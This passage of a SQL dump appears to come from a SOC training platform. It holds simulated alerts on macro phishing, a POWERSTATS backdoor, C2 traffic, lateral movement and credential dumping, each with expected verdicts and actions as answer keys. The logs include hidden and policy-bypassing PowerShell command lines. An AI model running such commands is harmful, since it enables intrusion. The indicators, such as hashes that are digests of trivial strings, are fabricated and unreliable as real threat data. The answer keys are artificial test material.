exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.964Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:43Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-005\\\",\\\"source_ip\\\":\\\"192.168.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"target_CDR_records.zip\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"size\\\":\\\"15MB\\\"}],\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.964Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:43Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-005\\\",\\\"source_ip\\\":\\\"192.168.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"target_CDR_records.zip\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"size\\\":\\\"15MB\\\"}],\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.964Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:43Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-005\\\",\\\"source_ip\\\":\\\"192.168.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"target_CDR_records.zip\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"size\\\":\\\"15MB\\\"}],\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.964Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:43Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-005\\\",\\\"source_ip\\\":\\\"192.168.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"target_CDR_records.zip\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"size\\\":\\\"15MB\\\"}],\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.964Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:43Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-005\\\",\\\"source_ip\\\":\\\"192.168.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"target_CDR_records.zip\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"size\\\":\\\"15MB\\\"}],\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(369, 'Suspicious Macro-Enabled Document Detected', 'high', 'Email Gateway Logs', 'A potentially malicious macro-enabled document was detected in an email attachment. The document is designed to execute a payload upon enabling macros, indicating an attempt to gain initial access.', 'Initial Access', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T11:25:34Z\",\"email_sender\":\"john.doe@maliciousdomain.com\",\"email_recipient\":\"employee1@company.com\",\"subject\":\"Important Update on Your Account\",\"attachment_name\":\"AccountUpdate.docm\",\"attachment_hash\":\"4a6f0f5d2b1e8f7d9e9a6c2f3b5e7d8f\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.15\",\"malware_family\":\"Emotet\",\"action_taken\":\"Quarantined\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with Emotet campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"AccountUpdate.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"suspicious\",\"details\":\"Macro-enabled document potentially executing malicious code.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4a6f0f5d2b1e8f7d9e9a6c2f3b5e7d8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Emotet malware.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to known phishing and malware distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Macro-Enabled Document Detected\",\"date\":\"2026-02-01T20:32:18.965Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(370, 'Macro Execution Triggers Malicious Script', 'high', 'Endpoint Detection and Response (EDR)', 'Once the macros are enabled, a hidden script is executed, initiating the deployment of the POWERSTATS backdoor.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.45\",\"username\":\"jdoe\",\"process_name\":\"winword.exe\",\"file_name\":\"malicious_macro.docm\",\"script_executed\":\"powershell.exe -nop -w hidden -enc d2hvYW1p\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"Macro in document executed, launching PowerShell script for POWERSTATS backdoor.\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal endpoint targeted by malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_macro.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document contains macro that executes malicious script.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the POWERSTATS malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(371, 'POWERSTATS Backdoor Installed', 'high', 'Registry Change Logs', 'The POWERSTATS backdoor has been installed on the system. It modifies registry settings to ensure continued operation across reboots, establishing persistence.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T14:32:45Z\",\"event_id\":4657,\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"PowerStatsService\",\"value_type\":\"REG_SZ\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\pstats.exe\",\"user\":\"SYSTEM\",\"user_sid\":\"S-1-5-18\",\"process_id\":1234,\"process_name\":\"regedit.exe\",\"source_ip\":\"185.199.108.153\",\"hash\":\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\",\"internal_ip\":\"192.168.1.45\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for POWERSTATS\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as POWERSTATS backdoor\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Associated with persistence mechanism\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host communicating with C2\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PowerStatsService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pstats.exe\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"user_sid\\\":\\\"S-1-5-18\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"hash\\\":\\\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PowerStatsService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pstats.exe\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"user_sid\\\":\\\"S-1-5-18\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"hash\\\":\\\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PowerStatsService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pstats.exe\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"user_sid\\\":\\\"S-1-5-18\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"hash\\\":\\\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PowerStatsService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pstats.exe\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"user_sid\\\":\\\"S-1-5-18\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"hash\\\":\\\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PowerStatsService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pstats.exe\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"user_sid\\\":\\\"S-1-5-18\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"hash\\\":\\\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(372, 'Encrypted Communication with C2 Server Detected', 'high', 'Network Traffic Analysis', 'The infected system at 192.168.10.5 has begun encrypted communication with a known C2 server at 203.0.113.45 using HTTPS over non-standard ports. This behavior is consistent with advanced tactics to maintain hidden communication channels.', 'Command and Control', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:20Z\",\"src_ip\":\"192.168.10.5\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"src_port\":50505,\"dst_port\":8443,\"encrypted\":true,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"url\":\"https://203.0.113.45/command\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"payload.bin\",\"username\":\"infected_user\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known Command and Control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Associated with malware payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Potentially malicious file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"infected_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account on affected system\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(373, 'Lateral Movement Attempt Detected', 'high', 'Internal Network Logs', 'An advanced lateral movement attempt was detected on the network. The attackers used a compromised host to attempt to access other machines within the network, utilizing stolen credentials and suspicious file transfers.', 'Lateral Movement', 'T1086 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"lateral_movement\",\"source_ip\":\"10.0.1.5\",\"destination_ip\":\"192.168.1.20\",\"attacker_ip\":\"203.0.113.12\",\"compromised_user\":\"jdoe\",\"malicious_file\":\"payload.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"PowerShell execution\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File \\\\\\\\192.168.1.20\\\\share\\\\payload.exe\",\"detected_by\":\"Host Intrusion Prevention System (HIPS)\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Suspicious executable file\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(374, 'Credential Dumping Activity Spotted', 'high', 'Security Information and Event Management (SIEM)', 'An advanced attack has been identified where the attackers have deployed a credential dumping tool to extract passwords from memory, potentially to escalate privileges within the network. The activity was traced back to a specific host within the internal network, and network traffic analysis confirmed communication with a known malicious IP.', 'Credential Access', 'T1003.001 - OS Credential Dumping: LSASS Memory', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:35Z\",\"event_type\":\"credential_dumping\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"185.143.221.45\",\"file_name\":\"lsass_dump.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"administrator\",\"process_name\":\"lsass.exe\",\"detected_tool\":\"Mimikatz\",\"network_traffic\":{\"bytes_sent\":2048,\"bytes_received\":1024,\"protocol\":\"HTTP\"}}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.143.221.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with credential dumping activities\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"lsass_dump.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_detection\",\"verdict\":\"suspicious\",\"details\":\"File name commonly associated with credential dumping attacks\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash linked to Mimikatz malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Privileged user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:35Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.143.221.45\\\",\\\"file_name\\\":\\\"lsass_dump.exe\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"administrator\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"detected_tool\\\":\\\"Mimikatz\\\",\\\"network_traffic\\\":{\\\"bytes_sent\\\":2048,\\\"bytes_received\\\":1024,\\\"protocol\\\":\\\"HTTP\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:18.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:35Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.143.221.45\\\",\\\"file_name\\\":\\\"lsass_dump.exe\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"user\\\":\\\"administrator\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"detected_tool\\\":\\\"Mimikatz\\\",\\\"network_traffic\\\":{\\\"bytes_sent\\\":2048,\\\"bytes_received\\\":1024,\\\"protocol\\\":\\\"HTTP\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:18.969Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 